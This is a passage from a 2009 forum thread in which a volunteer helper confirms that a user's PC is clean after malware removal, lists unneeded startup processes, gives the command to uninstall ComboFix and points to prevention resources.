I rebooted and ran combo fix. It said it had expired and would run in limited functionality mode. I deleted it and downloaded a fresh copy but it did the same thing.

Log is attached.

as of this email I do not see them back in the root. Do you think we're in the clear??

Also, did you notice any processes running that were just unnecessary?

thanks for your help.

Kevin


#8 Thunder

Thunder

  • Members
  • 3,294 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Belgium
  • Local time:03:41 PM

Posted 31 January 2009 - 07:21 PM

Hello Kdt2121,

Your log looks fine now,
seems like we got them now. :thumbup2:

These processes do not need to start up with Windows, and can be unchecked in Msconfig:

DSentry.exe
NvMcTray.dll
igfxtray.exe
igfxpers.exe
qttask.exe
realsched.exe

You can remove all used tools and folders created in the process.
To remove ComboFix:
Go to Start > Run, and copy and paste the next command in the field:

ComboFix /u

Make sure there's a space between Combofix and /u
Then press Enter.
This will uninstall Combofix, delete its related folders and files, restore your clock settings, hide file extensions, hide the system/hidden files and resets System Restore again.

No more problems ?

Greetings,
Thunder

#9 kdt2121

kdt2121
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:07:41 AM

Posted 02 February 2009 - 05:56 PM

I have uninstalled combo fix.

I also uninstalled and reinstalled the Trend Micro Suite. (somehow the spam toolbar got uninstalled in outlook)

Everything seems to be running fine. No more entries in processes or root.

Thanks for your help.

Kevin

#10 Thunder

Thunder

  • Members
  • 3,294 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Belgium
  • Local time:03:41 PM

Posted 03 February 2009 - 03:07 AM

Glad we could help, Kevin :thumbup2:

Please read this Prevention page with lots of info and tips how to prevent this in the future.
And if you want to improve speed/system performance after malware removal, take a look here.
Extra note: Make sure your programs are up to date - because older versions may contain Security Leaks.
To find out what programs need to be updated, please run the Secunia Software Inspector Scan.

Please also read Tony Klein's excellent article: How I got Infected in the First Place
and/or Grinlers tutorial on how malware is hidden and installed

Since this issue appears resolved ... this Topic is closed.
If you need this topic reopened for continuations of existing problems, please request this by sending me a PM with the address of the thread. This applies only to the original topic starter.

Everyone else please begin a New Topic.